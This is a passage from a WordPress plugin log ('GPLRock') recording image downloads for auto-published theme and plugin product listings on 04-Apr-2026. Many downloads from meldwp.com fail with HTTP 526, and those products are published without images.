attempts. HTTP Code: 526, Error: [04-Apr-2026 08:01:35 UTC] GPLRock WARNING: Image download failed for product classifieds-classified-ads-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/classifieds---classified-ads-wordpress-theme-10369.webp [04-Apr-2026 08:01:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: classifieds-classified-ads-wordpress-theme [04-Apr-2026 08:01:35 UTC] GPLRock: Image downloaded successfully for product plumber-construction-and-repairing-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-443d4774.webp [04-Apr-2026 08:01:35 UTC] GPLRock: Using pre-downloaded image for product plumber-construction-and-repairing-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-443d4774.webp [04-Apr-2026 08:01:35 UTC] GPLRock: Ghost product published with image - Product ID: plumber-construction-and-repairing-wordpress-theme [04-Apr-2026 08:01:35 UTC] GPLRock: Image download failed for product optima-simple-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:01:37 UTC] GPLRock: Image download failed for product optima-simple-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:01:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/optima---simple-magazine-wordpress-theme-23517.webp for product optima-simple-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:01:39 UTC] GPLRock: Image download failed for product optima-simple-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:01:41 UTC] GPLRock: Image download failed for product optima-simple-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:01:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/optima---simple-magazine-wordpress-theme-23517.webp for product optima-simple-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:01:43 UTC] GPLRock WARNING: Image download failed for product optima-simple-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/optima---simple-magazine-wordpress-theme-23517.webp [04-Apr-2026 08:01:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: optima-simple-magazine-wordpress-theme [04-Apr-2026 08:01:43 UTC] GPLRock: Image download failed for product binace-fashion-shop-woocommerce-wordpress-theme-mobile-layout-ready (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:01:46 UTC] GPLRock: Image download failed for product binace-fashion-shop-woocommerce-wordpress-theme-mobile-layout-ready (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:01:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/binace---fashion-shop-woocommerce-wordpress-theme-mobile-layout-ready-23741.webp for product binace-fashion-shop-woocommerce-wordpress-theme-mobile-layout-ready after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:01:48 UTC] GPLRock: Image download failed for product binace-fashion-shop-woocommerce-wordpress-theme-mobile-layout-ready (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:01:50 UTC] GPLRock: Image download failed for product binace-fashion-shop-woocommerce-wordpress-theme-mobile-layout-ready (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:01:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/binace---fashion-shop-woocommerce-wordpress-theme-mobile-layout-ready-23741.webp for product binace-fashion-shop-woocommerce-wordpress-theme-mobile-layout-ready after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:01:52 UTC] GPLRock WARNING: Image download failed for product binace-fashion-shop-woocommerce-wordpress-theme-mobile-layout-ready. URL: https://meldwp.com/wp-content/uploads/binace---fashion-shop-woocommerce-wordpress-theme-mobile-layout-ready-23741.webp [04-Apr-2026 08:01:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: binace-fashion-shop-woocommerce-wordpress-theme-mobile-layout-ready [04-Apr-2026 08:01:52 UTC] GPLRock: Image download failed for product dove-handmade-crafts-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:01:54 UTC] GPLRock: Image download failed for product dove-handmade-crafts-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:01:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dove--handmade-crafts-woocommerce-wordpress-theme-14464.webp for product dove-handmade-crafts-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:01:56 UTC] GPLRock: Image download failed for product dove-handmade-crafts-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:01:59 UTC] GPLRock: Image download failed for product dove-handmade-crafts-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:02:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dove--handmade-crafts-woocommerce-wordpress-theme-14464.webp for product dove-handmade-crafts-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:02:01 UTC] GPLRock WARNING: Image download failed for product dove-handmade-crafts-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/dove--handmade-crafts-woocommerce-wordpress-theme-14464.webp [04-Apr-2026 08:02:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dove-handmade-crafts-woocommerce-wordpress-theme [04-Apr-2026 08:03:06 UTC] GPLRock: Image downloaded successfully for product comment-form-for-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3c18ae59.jpg [04-Apr-2026 08:03:06 UTC] GPLRock: Using pre-downloaded image for product comment-form-for-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3c18ae59.jpg [04-Apr-2026 08:03:06 UTC] GPLRock: Ghost product published with image - Product ID: comment-form-for-amp [04-Apr-2026 08:03:07 UTC] GPLRock: Image downloaded successfully for product rare-radio-online-music-radio-station-podcast-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-383b8258.jpg [04-Apr-2026 08:03:07 UTC] GPLRock: Using pre-downloaded image for product rare-radio-online-music-radio-station-podcast-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-383b8258.jpg [04-Apr-2026 08:03:07 UTC] GPLRock: Ghost product published with image - Product ID: rare-radio-online-music-radio-station-podcast-wordpress-theme [04-Apr-2026 08:03:09 UTC] GPLRock: Image downloaded successfully for product amdesk-helpdesk-and-knowledge-base-html-template (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b9db2aff.jpg [04-Apr-2026 08:03:09 UTC] GPLRock: Using pre-downloaded image for product amdesk-helpdesk-and-knowledge-base-html-template: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b9db2aff.jpg [04-Apr-2026 08:03:09 UTC] GPLRock: Ghost product published with image - Product ID: amdesk-helpdesk-and-knowledge-base-html-template [04-Apr-2026 08:03:10 UTC] GPLRock: Image downloaded successfully for product brixton-a-responsive-wordpress-blog-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c5fb1000.jpg [04-Apr-2026 08:03:10 UTC] GPLRock: Using pre-downloaded image for product brixton-a-responsive-wordpress-blog-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c5fb1000.jpg [04-Apr-2026 08:03:10 UTC] GPLRock: Ghost product published with image - Product ID: brixton-a-responsive-wordpress-blog-theme [04-Apr-2026 08:03:12 UTC] GPLRock: Image downloaded successfully for product yozi-multipurpose-electronics-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4f782aec.jpg [04-Apr-2026 08:03:12 UTC] GPLRock: Using pre-downloaded image for product yozi-multipurpose-electronics-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4f782aec.jpg [04-Apr-2026 08:03:12 UTC] GPLRock: Ghost product published with image - Product ID: yozi-multipurpose-electronics-woocommerce-wordpress-theme [04-Apr-2026 08:03:13 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-invoices-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bbc4ea0f.jpg [04-Apr-2026 08:03:13 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-invoices-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bbc4ea0f.jpg [04-Apr-2026 08:03:13 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-invoices-addon [04-Apr-2026 08:03:14 UTC] GPLRock: Image downloaded successfully for product contact-form-7-for-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-906d6143.jpg [04-Apr-2026 08:03:14 UTC] GPLRock: Using pre-downloaded image for product contact-form-7-for-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-906d6143.jpg [04-Apr-2026 08:03:14 UTC] GPLRock: Ghost product published with image - Product ID: contact-form-7-for-amp [04-Apr-2026 08:03:16 UTC] GPLRock: Image downloaded successfully for product spring-plants-gardening-houseplants-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dca0730f.jpg [04-Apr-2026 08:03:16 UTC] GPLRock: Using pre-downloaded image for product spring-plants-gardening-houseplants-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dca0730f.jpg [04-Apr-2026 08:03:16 UTC] GPLRock: Ghost product published with image - Product ID: spring-plants-gardening-houseplants-wordpress [04-Apr-2026 08:03:18 UTC] GPLRock: Image downloaded successfully for product gustablo-restaurant-cafe-responsive-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e4a27e57.jpg [04-Apr-2026 08:03:18 UTC] GPLRock: Using pre-downloaded image for product gustablo-restaurant-cafe-responsive-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e4a27e57.jpg [04-Apr-2026 08:03:18 UTC] GPLRock: Ghost product published with image - Product ID: gustablo-restaurant-cafe-responsive-wordpress [04-Apr-2026 08:03:20 UTC] GPLRock: Image downloaded successfully for product pdf-embed-wordpress-pdf-viewer-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2005a6ba.jpg [04-Apr-2026 08:03:20 UTC] GPLRock: Using pre-downloaded image for product pdf-embed-wordpress-pdf-viewer-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2005a6ba.jpg [04-Apr-2026 08:03:20 UTC] GPLRock: Ghost product published with image - Product ID: pdf-embed-wordpress-pdf-viewer-plugin [04-Apr-2026 08:04:12 UTC] GPLRock: Image download failed for product granny-elegant-restaurant-cafe-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:04:14 UTC] GPLRock: Image download failed for product granny-elegant-restaurant-cafe-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:04:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/granny---elegant-restaurant--cafe-wordpress-theme-33295.webp for product granny-elegant-restaurant-cafe-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:04:17 UTC] GPLRock: Image download failed for product granny-elegant-restaurant-cafe-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:04:19 UTC] GPLRock: Image download failed for product granny-elegant-restaurant-cafe-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:04:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/granny---elegant-restaurant--cafe-wordpress-theme-33295.webp for product granny-elegant-restaurant-cafe-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:04:21 UTC] GPLRock WARNING: Image download failed for product granny-elegant-restaurant-cafe-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/granny---elegant-restaurant--cafe-wordpress-theme-33295.webp [04-Apr-2026 08:04:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: granny-elegant-restaurant-cafe-wordpress-theme [04-Apr-2026 08:04:21 UTC] GPLRock: Image download failed for product picard-vcard-resume-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:04:23 UTC] GPLRock: Image download failed for product picard-vcard-resume-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:04:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/picard---vcard--resume-wordpress-theme-17496.webp for product picard-vcard-resume-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:04:25 UTC] GPLRock: Image download failed for product picard-vcard-resume-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:04:27 UTC] GPLRock: Image download failed for product picard-vcard-resume-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:04:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/picard---vcard--resume-wordpress-theme-17496.webp for product picard-vcard-resume-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:04:29 UTC] GPLRock WARNING: Image download failed for product picard-vcard-resume-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/picard---vcard--resume-wordpress-theme-17496.webp [04-Apr-2026 08:04:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: picard-vcard-resume-wordpress-theme [04-Apr-2026 08:04:30 UTC] GPLRock: Image downloaded successfully for product top-club-sports-theme-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a0987321.webp [04-Apr-2026 08:04:30 UTC] GPLRock: Using pre-downloaded image for product top-club-sports-theme-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a0987321.webp [04-Apr-2026 08:04:30 UTC] GPLRock: Ghost product published with image - Product ID: top-club-sports-theme-for-wordpress [04-Apr-2026 08:04:30 UTC] GPLRock: Image download failed for product the-luxury-dark-light-responsive-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:04:32 UTC] GPLRock: Image download failed for product the-luxury-dark-light-responsive-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:04:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-luxury---dark--light-responsive-wordpress-3914.webp for product the-luxury-dark-light-responsive-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:04:34 UTC] GPLRock: Image download failed for product the-luxury-dark-light-responsive-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:04:36 UTC] GPLRock: Image download failed for product the-luxury-dark-light-responsive-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:04:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-luxury---dark--light-responsive-wordpress-3914.webp for product the-luxury-dark-light-responsive-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:04:38 UTC] GPLRock WARNING: Image download failed for product the-luxury-dark-light-responsive-wordpress. URL: https://meldwp.com/wp-content/uploads/the-luxury---dark--light-responsive-wordpress-3914.webp [04-Apr-2026 08:04:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: the-luxury-dark-light-responsive-wordpress [04-Apr-2026 08:04:38 UTC] GPLRock: Image download failed for product luvaniz-creative-one-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:04:40 UTC] GPLRock: Image download failed for product luvaniz-creative-one-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:04:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/luvaniz---creative-one-page-wordpress-theme-14168.webp for product luvaniz-creative-one-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:04:43 UTC] GPLRock: Image download failed for product luvaniz-creative-one-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:04:45 UTC] GPLRock: Image download failed for product luvaniz-creative-one-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:04:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/luvaniz---creative-one-page-wordpress-theme-14168.webp for product luvaniz-creative-one-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:04:47 UTC] GPLRock WARNING: Image download failed for product luvaniz-creative-one-page-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/luvaniz---creative-one-page-wordpress-theme-14168.webp [04-Apr-2026 08:04:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: luvaniz-creative-one-page-wordpress-theme [04-Apr-2026 08:04:47 UTC] GPLRock: Image download failed for product bridey-bridal-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:04:49 UTC] GPLRock: Image download failed for product bridey-bridal-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:04:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bridey---bridal-store-woocommerce-wordpress-theme-9711.webp for product bridey-bridal-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:04:51 UTC] GPLRock: Image download failed for product bridey-bridal-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:04:53 UTC] GPLRock: Image download failed for product bridey-bridal-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:04:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bridey---bridal-store-woocommerce-wordpress-theme-9711.webp for product bridey-bridal-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:04:55 UTC] GPLRock WARNING: Image download failed for product bridey-bridal-store-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/bridey---bridal-store-woocommerce-wordpress-theme-9711.webp [04-Apr-2026 08:04:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bridey-bridal-store-woocommerce-wordpress-theme [04-Apr-2026 08:04:56 UTC] GPLRock: Image download failed for product autumn-responsive-prestashop-16-theme-with-blog (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:04:58 UTC] GPLRock: Image download failed for product autumn-responsive-prestashop-16-theme-with-blog (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:05:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/autumn---responsive-prestashop-16-theme-with-blog-23235.webp for product autumn-responsive-prestashop-16-theme-with-blog after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:05:00 UTC] GPLRock: Image download failed for product autumn-responsive-prestashop-16-theme-with-blog (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:05:02 UTC] GPLRock: Image download failed for product autumn-responsive-prestashop-16-theme-with-blog (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:05:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/autumn---responsive-prestashop-16-theme-with-blog-23235.webp for product autumn-responsive-prestashop-16-theme-with-blog after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:05:04 UTC] GPLRock WARNING: Image download failed for product autumn-responsive-prestashop-16-theme-with-blog. URL: https://meldwp.com/wp-content/uploads/autumn---responsive-prestashop-16-theme-with-blog-23235.webp [04-Apr-2026 08:05:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: autumn-responsive-prestashop-16-theme-with-blog [04-Apr-2026 08:05:04 UTC] GPLRock: Image download failed for product zeplin-creative-gutenberg-one-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:05:06 UTC] GPLRock: Image download failed for product zeplin-creative-gutenberg-one-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:05:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zeplin--creative-gutenberg-one-page-wordpress-theme-12955.webp for product zeplin-creative-gutenberg-one-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:05:09 UTC] GPLRock: Image download failed for product zeplin-creative-gutenberg-one-page-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:05:11 UTC] GPLRock: Image download failed for product zeplin-creative-gutenberg-one-page-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:05:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zeplin--creative-gutenberg-one-page-wordpress-theme-12955.webp for product zeplin-creative-gutenberg-one-page-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:05:13 UTC] GPLRock WARNING: Image download failed for product zeplin-creative-gutenberg-one-page-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/zeplin--creative-gutenberg-one-page-wordpress-theme-12955.webp [04-Apr-2026 08:05:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: zeplin-creative-gutenberg-one-page-wordpress-theme [04-Apr-2026 08:05:13 UTC] GPLRock: Image download failed for product enfant-school-and-kindergarten-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:05:15 UTC] GPLRock: Image download failed for product enfant-school-and-kindergarten-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:05:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/enfant---school-and-kindergarten-wordpress-theme-5922.webp for product enfant-school-and-kindergarten-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:05:17 UTC] GPLRock: Image download failed for product enfant-school-and-kindergarten-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:05:19 UTC] GPLRock: Image download failed for product enfant-school-and-kindergarten-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:05:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/enfant---school-and-kindergarten-wordpress-theme-5922.webp for product enfant-school-and-kindergarten-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:05:21 UTC] GPLRock WARNING: Image download failed for product enfant-school-and-kindergarten-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/enfant---school-and-kindergarten-wordpress-theme-5922.webp [04-Apr-2026 08:05:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: enfant-school-and-kindergarten-wordpress-theme [04-Apr-2026 08:05:22 UTC] GPLRock: Image download failed for product finnik-minimal-wordpress-theme-for-photographers (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:05:24 UTC] GPLRock: Image download failed for product finnik-minimal-wordpress-theme-for-photographers (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:05:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/finnik---minimal-wordpress-theme-for-photographers-15848.webp for product finnik-minimal-wordpress-theme-for-photographers after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:05:26 UTC] GPLRock: Image download failed for product finnik-minimal-wordpress-theme-for-photographers (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:05:28 UTC] GPLRock: Image download failed for product finnik-minimal-wordpress-theme-for-photographers (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 08:05:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/finnik---minimal-wordpress-theme-for-photographers-15848.webp for product finnik-minimal-wordpress-theme-for-photographers after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 08:05:30 UTC] GPLRock WARNING: Image download failed for product finnik-minimal-wordpress-theme-for-photographers. URL: https://meldwp.com/wp-content/uploads/finnik---minimal-wordpress-theme-for-photographers-15848.webp [04-Apr-2026 08:05:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: finnik-minimal-wordpress-theme-for-photographers [04-Apr-2026 08:06:37 UTC] GPLRock: Image downloaded successfully for product woocommerce-weight-based-shipping (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ecba9431.jpg [04-Apr-2026 08:06:37 UTC] GPLRock: Using pre-downloaded image for product woocommerce-weight-based-shipping: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ecba9431.jpg [04-Apr-2026 08:06:37 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-weight-based-shipping [04-Apr-2026 08:06:39 UTC] GPLRock: Image downloaded successfully for product nex-forms-the-ultimate-wordpress-form-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a0fa93bd.jpg [04-Apr-2026 08:06:39 UTC] GPLRock: Using pre-downloaded image for product nex-forms-the-ultimate-wordpress-form-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a0fa93bd.jpg [04-Apr-2026 08:06:39 UTC] GPLRock: Ghost product published with image - Product ID: nex-forms-the-ultimate-wordpress-form-builder [04-Apr-2026 08:06:41 UTC] GPLRock: Image downloaded successfully for product superfly-menu-responsive-wordpress-menu-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4ade2532.jpg [04-Apr-2026 08:06:41 UTC] GPLRock: Using pre-downloaded image for product superfly-menu-responsive-wordpress-menu-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4ade2532.jpg [04-Apr-2026 08:06:41 UTC] GPLRock: Ghost product published with image - Product ID: superfly-menu-responsive-wordpress-menu-plugin [04-Apr-2026 08:06:42 UTC] GPLRock: Image downloaded successfully for product dflip-pdf-flipbook-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d7a602e6.jpg [04-Apr-2026 08:06:42 UTC] GPLRock: Using pre-downloaded image for product dflip-pdf-flipbook-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d7a602e6.jpg [04-Apr-2026 08:06:42 UTC] GPLRock: Ghost product published with image - Product ID: dflip-pdf-flipbook-wordpress-plugin [04-Apr-2026 08:06:43 UTC] GPLRock: Image downloaded successfully for product searchwp-wpml-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7513a896.jpg [04-Apr-2026 08:06:43 UTC] GPLRock: Using pre-downloaded image for product searchwp-wpml-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7513a896.jpg [04-Apr-2026 08:06:43 UTC] GPLRock: Ghost product published with image - Product ID: searchwp-wpml-integration [04-Apr-2026 08:06:45 UTC] GPLRock: Image downloaded successfully for product wordpress-whatsapp-support (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6f4f0f30.jpg [04-Apr-2026 08:06:45 UTC] GPLRock: Using pre-downloaded image for product wordpress-whatsapp-support: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6f4f0f30.jpg [04-Apr-2026 08:06:45 UTC] GPLRock: Ghost product published with image - Product ID: wordpress-whatsapp-support [04-Apr-2026 08:06:46 UTC] GPLRock: Image downloaded successfully for product woocommerce-multiple-customer-addresses (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-903a634e.jpg [04-Apr-2026 08:06:47 UTC] GPLRock: Using pre-downloaded image for product woocommerce-multiple-customer-addresses: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-903a634e.jpg [04-Apr-2026 08:06:47 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-multiple-customer-addresses [04-Apr-2026 08:06:50 UTC] GPLRock: Image downloaded successfully for product thrive-apprentice (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-53e51846.jpg [04-Apr-2026 08:06:50 UTC] GPLRock: Using pre-downloaded image for product thrive-apprentice: 